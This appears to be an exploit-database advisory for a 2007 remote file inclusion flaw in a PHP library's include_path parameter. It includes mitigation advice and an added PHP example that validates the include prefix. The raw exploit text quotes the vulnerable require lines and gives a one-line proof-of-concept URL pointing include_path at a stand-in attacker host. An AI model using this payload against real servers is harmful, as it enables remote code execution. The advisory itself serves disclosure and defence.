Vendor: PhP Generic library & framework
By: xoron
CVSS: 7.5 (HIGH)
Remote File Include
CWE: File Inclusion
Product Name: PhP Generic library & framework
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Not specified
2007

PhP Generic library & framework (include_path) Remote File Include Exploit

This exploit targets a vulnerability in the PhP Generic library & framework where an attacker can include remote files using the 'include_path' parameter. By manipulating the 'include_path' parameter, an attacker can execute malicious code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input and sanitize any input used in file inclusion functions. Additionally, restricting access to sensitive files and directories can help prevent remote file inclusion attacks.
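
The mitigation above, applied to the two `require` lines from the advisory, as an added example that is not the project's own code. It assumes PHP 7+ and that the global prefix can be set from the request, as the description states; `APP_ROOT`, `include_base()` and the demo directory are hypothetical names, and the rejected values are constructed.

```php
<?php
// Added example, not the project's code. Assumes PHP 7+.
// APP_ROOT, include_base() and the demo tree are hypothetical.

// Pattern from the advisory: the prefix is a global the request can set.
//   require $GLOBALS[include_path]."configmember.php";

// Constructed demo tree standing in for the application's own files.
define('APP_ROOT', sys_get_temp_dir() . '/rfi_demo_' . getmypid());
@mkdir(APP_ROOT . '/membres', 0700, true);
foreach (['configmember.php', 'inc-membreManager.php'] as $f) {
    file_put_contents(APP_ROOT . "/membres/$f", "<?php // demo stub\n");
}

/** Return a trusted include prefix, or throw if $candidate is unsafe. */
function include_base(string $candidate): string
{
    $root = realpath(APP_ROOT);
    // realpath() only resolves local paths that exist, so a URL or a
    // missing directory yields false here.
    $real = realpath($candidate);
    if ($root === false || $real === false || !is_dir($real)) {
        throw new RuntimeException('include path is not a local directory');
    }
    // The resolved path must be APP_ROOT itself or sit below it.
    if ($real !== $root && strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('include path is outside APP_ROOT');
    }
    return $real . DIRECTORY_SEPARATOR;
}

// The prefix is fixed in code and never read from $_GET, $_POST or $GLOBALS.
$base = include_base(APP_ROOT . '/membres');
require $base . 'configmember.php';
require $base . 'inc-membreManager.php';

// Constructed hostile values of the kind the advisory describes.
foreach (['http://example.invalid/', '/etc', APP_ROOT . '/..'] as $bad) {
    try {
        include_base($bad);
        echo "accepted (unexpected): $bad\n";
    } catch (RuntimeException $e) {
        echo "rejected: $bad ({$e->getMessage()})\n";
    }
}
```

Setting `allow_url_include = Off` in php.ini (the default since PHP 5.2) blocks URL targets in `include` and `require` as a second layer.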

Exploit-DB raw data:

-----------------------------------------------

PhP Generic library & framework (include_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz

-----------------------------------------------

Code:

require $GLOBALS[include_path]."configmember.php";
require $GLOBALS[include_path]."inc-membreManager.php";

-----------------------------------------------

POC:

www.[target].com/[script_pat]/membres/membreManager.php?include_path=http://evilscripts?

-----------------------------------------------

download: http://sourceforge.net/project/showfiles.php?group_id=72529

-----------------------------------------------

xoron goes, his trace remains; farewell.

xoron, a kid addicted to losing.

-----------------------------------------------

# milw0rm.com [2007-01-28]